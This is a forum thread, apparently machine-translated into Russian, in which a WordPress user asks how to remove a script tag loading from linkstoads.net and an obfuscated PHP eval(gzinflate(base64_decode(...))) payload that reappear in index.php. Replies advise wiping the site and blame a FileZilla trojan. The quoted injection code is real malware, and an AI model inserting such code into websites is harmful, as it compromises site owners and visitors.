Ссылка на linkstoads.net в моем блоге WordPress, вероятно, вирус. Как мне от этого избавиться?

Question

Ссылка на linkstoads.net в моем блоге WordPress, вероятно, вирус. Как мне от этого избавиться?

Недавно (последние 2 недели) эта строка кода появилась в нижнем колонтитуле блога WordPress:

<script type="text/javascript" src="http://linkstoads.net/keller/link.php?id=3" name="linkstats"></script>

Я не положил это здесь. Я понятия не имею о том, что он делает; но я хочу этого.

Для первой попытки я просто заменил шаблон, и он пропал на несколько минут. Но это вернулось.

Итак, я добрался до своего файла index.php (не шаблон, самый первый index.php) и нашел этот код:

#c3284d#
eval(gzinflate(base64_decode("JcxLDoMwDEXROVL3EHkBeMCsfLqRTKxgKYE0WLFVtbsvkOnRe5dDPBxMGmoSc/YTnj0Yfw03+lBjD05rOD2ayRMxp7KrHbRqX9hw55y53tpLlFda5+G8FHpfrTYmUw/LhC24wPjo/g==")));
#/c3284d#

Поэтому я удалил его, но он вернулся снова на следующий день.

Как это возможно? Я новичок в области вирусов и безопасности, поэтому ответ может быть очень простым.

1

wordpress security virus

Источник

user1692456 26 окт '12 в 19:50

2 ответа

Решение

Поздравляем! Тебя взломали! Скорее всего, вы не обновляли свое программное обеспечение в течение достаточно долгого времени, и несколько хакеров воспользовались известной уязвимостью в вашем программном обеспечении.

Как вы это исправите? Выжженная земля... Вы были взломаны многими ботами и, вероятно, проданы онлайн, как какая-то шлюха. Удалите весь веб-корень и начните с нуля. Убедитесь, что у вас есть последние версии каждого плагина и Wordpress.

Для записи Wordpress был написан обезьянами или детьми или детскими обезьянами... Несмотря на это, это одно из худших приложений, которое я когда-либо взламывал. Вероятно, они все еще используют ваш хэш пароля в качестве идентификатора сеанса, что означает, что они даже не понимают основы того, почему вы должны хэшировать пароли.

О, если тебя продолжают взламывать, выше профессионал.

0

Источник

user183528 27 окт '12 в 01:09

Другие вопросы по тегам wordpress security virus

user1692456 22 ноя '12 в 16:16 2012-11-22 16:16 · Accepted Answer · 2012-11-22 16:16

Проблема решена, WordPress не несет ответственности за это.

Существует троянец, заражающий filezilla, и когда вы открываете его, он внедряет код в каждую страницу, доступную через filezilla.

Это действительно большое дело, и 3 антивируса даже не смогли его найти.

Если вы видите это, отформатируйте свой компьютер.